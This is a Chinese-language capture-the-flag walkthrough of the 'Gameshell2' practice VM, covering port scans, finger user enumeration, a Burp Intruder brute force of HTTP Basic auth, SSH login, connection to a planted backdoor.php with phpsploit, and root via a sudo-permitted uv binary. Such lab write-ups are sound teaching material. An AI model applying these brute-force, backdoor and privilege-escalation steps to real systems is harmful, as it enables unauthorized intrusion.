Gameshell2

靶机说明

• QQ群：660930334

一、信息收集

1、主机探测

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sn 192.168.2.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-12-16 09:10 CST
Nmap scan report for 192.168.2.1
Host is up (0.00069s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00059s latency).
MAC Address: 08:00:27:59:EA:A8 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.25
Host is up (0.0013s latency).
MAC Address: 08:00:27:67:2B:0B (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.19 seconds

靶机IP：192.168.2.25

2、端口扫描

1.全端口扫描

┌──(root㉿kali)-[/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.25                   
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-12-15 09:41 CST
Nmap scan report for 192.168.2.25
Host is up (0.0093s latency).
Not shown: 65529 filtered tcp ports (no-response)
PORT    STATE SERVICE
22/tcp  open  ssh
25/tcp  open  smtp
79/tcp  open  finger
80/tcp  open  http
110/tcp open  pop3
143/tcp open  imap

Nmap done: 1 IP address (1 host up) scanned in 20.51 seconds

开放端口：22、25、79、80、110、143

2.详细信息扫描

┌──(root㉿kali)-[/miaosec]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p22,25,79,80,110,143 192.168.2.25
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-12-15 09:41 CST
Nmap scan report for 192.168.2.25
Host is up (0.0043s latency).

PORT    STATE SERVICE    VERSION
22/tcp  open  ssh        OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
25/tcp  open  tcpwrapped
|_smtp-commands: Couldn t establish connection on port 25
79/tcp  open  finger     OpenBSD fingerd (ported to Linux)
| finger: \x0D
| Welcome to Linux version 4.19.0-27-amd64 at GameShell2 !\x0D
| 
|  20:42:06 up 2 min,  0 users,  load average: 0.01, 0.01, 0.00
| \x0D
|_No one logged on.\x0D
80/tcp  open  http       Apache httpd 2.4.62 ((Debian))
| http-robots.txt: 1 disallowed entry 
|_/ternimal/
|_http-server-header: Apache/2.4.62 (Debian)
110/tcp open  tcpwrapped
143/tcp open  tcpwrapped
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: WAP
Running: Actiontec embedded, Linux
OS CPE: cpe:/h:actiontec:mi424wr-gen3i cpe:/o:linux:linux_kernel
OS details: Actiontec MI424WR-GEN3I WAP
Service Info: Host: GameShell2; OSs: Linux, Linux 4.19.0-27-amd64; CPE: cpe:/o:linux:linux_kernel, cpe:/o:linux:linux_kernel:4.19.0-27-amd64

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.54 seconds

1. 22端口: ssh服务
2. 25端口: 简单邮件传输协议-SMTP
3. 79端口: finger服务
4. 80端口: http服务
5. 110端口: 邮局协议-pop
6. 143端口: 互联网邮件访问协议-IMAP

3.udp扫描

┌──(root㉿kali)-[/miaosec]
└─# nmap -sU --top-ports 100 192.168.2.25                                  
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-12-15 09:42 CST
Nmap scan report for 192.168.2.25
Host is up (0.0013s latency).
Not shown: 99 closed udp ports (port-unreach)
PORT   STATE         SERVICE
68/udp open|filtered dhcpc
MAC Address: 08:00:27:7D:6D:AE (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 110.24 seconds

二、web渗透

1、目录扫描

┌──(root㉿kali)-[/miaosec]
└─# gobuster dir -u http://192.168.2.25 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,html,bak,md,db,js
...
/.html                (Status: 403) [Size: 277]
/index.html           (Status: 200) [Size: 14134]
/.php                 (Status: 403) [Size: 277]
/users.html           (Status: 200) [Size: 2052]
/robots.txt           (Status: 200) [Size: 35]
/terminal             (Status: 401) [Size: 459]
...

users.html应该是一个用户字典
同时查看页面源码发现有提示<!-- top1000 passwd -->，应该需要进行爆破

aa ab ac ad ae af ag ah ai aj ak al am an ao ap aq ar as at au av aw ax ay az ba bb bc bd be bf bg bh bi bj bk bl bm bn bo bp bq br bs bt bu bv bw bx by bz ca cb cc cd ce cf cg ch ci cj ck cl cm cn co cp cq cr cs ct cu cv cw cx cy cz da db dc dd de df dg dh di dj dk dl dm dn do dp dq dr ds dt du dv dw dx dy dz ea eb ec ed ee ef eg eh ei ej ek el em en eo ep eq er es et eu ev ew ex ey ez fa fb fc fd fe ff fg fh fi fj fk fl fm fn fo fp fq fr fs ft fu fv fw fx fy fz ga gb gc gd ge gf gg gh gi gj gk gl gm gn go gp gq gr gs gt gu gv gw gx gy gz ha hb hc hd he hf hg hh hi hj hk hl hm hn ho hp hq hr hs ht hu hv hw hx hy hz ia ib ic id ie if ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja jb jc jd je jf jg jh ji jj jk jl jm jn jo jp jq jr js jt ju jv jw jx jy jz ka kb kc kd ke kf kg kh ki kj kk kl km kn ko kp kq kr ks kt ku kv kw kx ky kz la lb lc ld le lf lg lh li lj lk ll lm ln lo lp lq lr ls lt lu lv lw lx ly lz ma mb mc md me mf mg mh mi mj mk ml mm mn mo mp mq mr ms mt mu mv mw mx my mz na nb nc nd ne nf ng nh ni nj nk nl nm nn no np nq nr ns nt nu nv nw nx ny nz oa ob oc od oe of og oh oi oj ok ol om on oo op oq or os ot ou ov ow ox oy oz pa pb pc pd pe pf pg ph pi pj pk pl pm pn po pp pq pr ps pt pu pv pw px py pz qa qb qc qd qe qf qg qh qi qj qk ql qm qn qo qp qq qr qs qt qu qv qw qx qy qz ra rb rc rd re rf rg rh ri rj rk rl rm rn ro rp rq rr rs rt ru rv rw rx ry rz sa sb sc sd se sf sg sh si sj sk sl sm sn so sp sq sr ss st su sv sw sx sy sz ta tb tc td te tf tg th ti tj tk tl tm tn to tp tq tr ts tt tu tv tw tx ty tz ua ub uc ud ue uf ug uh ui uj uk ul um un uo up uq ur us ut uu uv uw ux uy uz va vb vc vd ve vf vg vh vi vj vk vl vm vn vo vp vq vr vs vt vu vv vw vx vy vz wa wb wc wd we wf wg wh wi wj wk wl wm wn wo wp wq wr ws wt wu wv ww wx wy wz xa xb xc xd xe xf xg xh xi xj xk xl xm xn xo xp xq xr xs xt xu xv xw xx xy xz ya yb yc yd ye yf yg yh yi yj yk yl ym yn yo yp yq yr ys yt yu yv yw yx yy yz za zb zc zd ze zf zg zh zi zj zk zl zm zn zo zp zq zr zs zt zu zv zw zx zy zz

terminal需要进行用户认证登录

2、finger用户枚举

finger用户枚举工具：https://github.com/dev-angelist/Finger-User-Enumeration#
需要对代码进行修改：

def check_valid_user(output):
    """Function to check if the user is valid by analyzing the output."""
    if "no such user." in output:
	    return False
	else:
		return True
    
    #if "Login" in output and "Name" in output and "Super-User" in output:
    #    return True
    #if "ssh" in output:
    #    return True
    #return False

对finger用户进行枚举

┌──(root㉿kali)-[/miaosec/vulnyx/fing/Finger-User-Enumeration]
└─# python3 finger_user_enumeration.py -t 192.168.2.25 -w ../user.txt

  /  Starting finger-user-enum v1.0 by @dev-angelist
 /  https://github.com/dev-angelist/Finger-User-Enumeration
/  Scanning target: 192.168.2.25 on port 79 for 42 usernames at: 2025-12-15 11:09:41
====================================================================================

[+] User found: dt@192.168.2.25
[+] User found: lp@192.168.2.25

[!] 2 Users Found

发现两个用户dt和lp，经过查看返回的信息，确定最终的用户为dt

┌──(root㉿kali)-[/miaosec]
└─# finger lp@192.168.2.25         

Welcome to Linux version 4.19.0-27-amd64 at GameShell2 !

 03:41:06 up 5 min,  0 users,  load average: 0.00, 0.00, 0.00

Login: lp                               Name: lp
Directory: /var/spool/lpd               Shell: /usr/sbin/nologin
Never logged in.
No mail.
No Plan.

┌──(root㉿kali)-[/miaosec]
└─# finger dt@192.168.2.25

Welcome to Linux version 4.19.0-27-amd64 at GameShell2 !

 03:41:10 up 5 min,  0 users,  load average: 0.00, 0.00, 0.00

Login: dt                               Name: 
Directory: /home/dt                     Shell: /bin/bash
Never logged in.
No mail.
No Plan.

3、HTTP认证爆破

使用burpsuite进行爆破

GET /terminal HTTP/1.1
Host: 192.168.2.25
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Authorization: Basic ZHQ6MTIzNDU2 //解密为dt:123456

根据格式进行密码设置

1. 使用Intruder爆破，Sniper attack模式
2. Payloads设置，Payload type为Custom iterator
   1. Postion1为dt
   2. Postion1为:
   3. Postion3为密码
3. 设置加密模式，Payload processing为Base64-encode

最后成功解密出密码为ZHQ6cHVycGxlMQ%3d=，解密为dt:purple1，密码为purple1

登录成功后，发现是一个贪吃蛇的游戏，要求达到15分，手动运行一下，发现没有任何结果，经过抓包发现Your pass is: 0t4tdtlt

三、获取dt权限

使用凭证dt:0t4tdtlt进行登录

┌──(root㉿kali)-[~]
└─# ssh dt@192.168.2.25        
dt@GameShell2:~$ id
uid=1000(dt) gid=1000(dt) groups=1000(dt)

四、权限提升

1、获取www-data权限

发现很多命令都无法使用

dt@GameShell2:~$ sudo -l
Error: sudo command is restricted -l
dt@GameShell2:~$ cd /
Error: cd command is restricted /

查看/home/dt目录，发现一个phpsploit目录

找到工具链接，发现是一个后门工具

同时找到一个域名dev.astra.dsz

dt@GameShell2:~$ ls -la /etc/apache2/sites-enabled/
total 8
drwxr-xr-x 2 root root 4096 Nov 21 03:06 .
drwxr-xr-x 8 root root 4096 Nov 21 03:28 ..
lrwxrwxrwx 1 root root   35 Apr  1  2025 000-default.conf -> ../sites-available/000-default.conf
lrwxrwxrwx 1 root root   37 Nov 21 03:05 dev.astra.dsz.conf -> ../sites-available/dev.astra.dsz.conf

进行目录扫描，发现一个文件backdoor.php

┌──(root㉿kali)-[~/miaosec]
└─# gobuster dir -u http://dev.astra.dsz -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,html,bak,md,db,js
...
/.html                (Status: 403) [Size: 278]
/.php                 (Status: 403) [Size: 278]
/index.html           (Status: 200) [Size: 68]
/backdoor.php         (Status: 200) [Size: 0]
...

使用phpsploit进行连接

phpsploit > set TRAGET dev.astra.dsz/backdooor.php
phpsploit > exploit

2、获取root权限

查看sudo

Matching Defaults entries for www-data on GameShell2:
	env reset,mail badpass,
	secure path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on GameShell2:
	(ALL)NOPASSWD: /usr/local/bin/uv

/usr/local/bin/uv提权，可以直接运行shell

www-data@Gameshell2:/var/www$ suudo /usr/local/bin/uv run /bin/bash